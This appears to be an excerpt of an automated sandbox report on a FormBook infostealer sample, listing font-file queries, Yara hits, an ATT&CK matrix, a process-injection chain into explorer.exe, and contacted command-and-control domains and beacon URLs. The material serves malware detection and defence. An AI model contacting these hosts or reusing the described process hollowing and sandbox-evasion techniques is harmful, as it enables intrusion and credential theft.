          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exe, key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, file source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (6, 1, 2) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (1, 2, 1) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (1) | Security Account Manager | Virtualization/Sandbox Evasion (3, 1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (3, 1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (1, 2) | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (6, 1, 2) | LSA Secrets | System Information Discovery (1, 1, 2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (3) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 452374, Sample: mal.pif, Start date: 22/07/2021, Architecture: WINDOWS, Score: 100

          Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures

          Process chain recovered from the graph:

          mal.exe (started)
            dropped file: C:\Users\user\AppData\Local\...\mal.exe.log, ASCII
            signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            -> mal.exe (started)
                 signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                 -> explorer.exe (injected)
                      DNS/IP: www.mybabytennis.com 209.99.64.55, ports 49741, 80, CONFLUENCE-NETWORK-INCVG, United States; www.sarahcarver.com 52.58.78.16, ports 49744, 80, AMAZON-02US, United States
                      signatures: System process connects to network (likely due to code injection or exploit)
                      -> control.exe (started)
                           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           -> cmd.exe (started)
                                -> conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          mal.exe | 61% | Virustotal |
          mal.exe | 26% | Metadefender |
          mal.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          mal.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.2.mal.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.sarahcarver.com | 52.58.78.16 | true | true | | unknown
          www.mybabytennis.com | 209.99.64.55 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk | true | Avira URL Cloud: safe | unknown
          www.trendtechpros.com/sm3l/ | true | Avira URL Cloud: safe | low
          http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://www.mybabytennis.com/fashion_trends.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1 | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comuei | mal.exe, 00000000.00000003.207782523.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/px.js?ch=1 | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/High_Speed_Internet.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lpt | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/12471/arrow.png) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cns-m_= | mal.exe, 00000000.00000003.204249088.000000000800E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.jiyu-kobo.co.jp/sys | mal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/12471/libgh.png) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/Migraine_Pain_Relief.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lp | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comcomde:i | mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.jiyu-kobo.co.jp// | mal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.mybabytennis.com/All_Inclusive_Vacation_Packages.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.krT | mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.comgrito | mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sandoll.co.kr.kr | mal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.krn | mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comde:i | mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9 | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.comueu | mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.krB | mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/ | mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comlic& | mal.exe, 00000000.00000003.205252766.0000000008008000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers~ | mal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com-mI: | mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cnf | mal.exe, 00000000.00000003.204709826.0000000008007000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comi | mal.exe, 00000000.00000003.204823498.0000000008008000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.come.com | mal.exe, 00000000.00000003.207824329.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.mybabytennis.com/Best_Penny_Stocks.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoB | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deeg | mal.exe, 00000000.00000003.210675196.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn0 | mal.exe, 00000000.00000003.204185338.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/v | mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.mybabytennis.com/Parental_Control.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBx | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comcomF | mal.exe, 00000000.00000003.210270469.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.comld9 | mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn8 | mal.exe, 00000000.00000003.204286511.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/display.cfm | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/px.js?ch=2 | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sarahcarver.com | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2 | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/R: | mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/49 | mal.exe, 00000000.00000003.205652032.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.comalice:i | mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.jiyu-kobo.co.jp/jp/49 | mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://www.domain.com/controlpanel/domaincentral/3.0/ | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.comepko | mal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.comroa | mal.exe, 00000000.00000003.204874236.0000000008008000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp; explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.com | mal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designersP | mal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/w: | mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mybabytennis.com/find_a_tutor.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1IN | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.como.p | mal.exe, 00000000.00000003.204733994.0000000008008000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comuetow: | mal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | mal.exe, 00000000.00000003.211735765.0000000008027000.00000004.00000001.sdmp; explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://i3.cdn-image.com/__media__/pics/12471/logo.png) | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersd | mal.exe, 00000000.00000003.209521434.000000000800A000.00000004.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | mal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmp; explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designersz | mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp; mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmp | false | - | high
http://www.urwpp.de | mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.jiyu-kobo.co.jp/es-mI: | mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comalssys | mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | mal.exe, 00000000.00000003.206412694.0000000008008000.00000004.00000001.sdmp; explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.comig | mal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp; explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot | control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comF | mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.urwpp.deZ | mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/D | mal.exe, 00000000.00000003.204496454.0000000008007000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
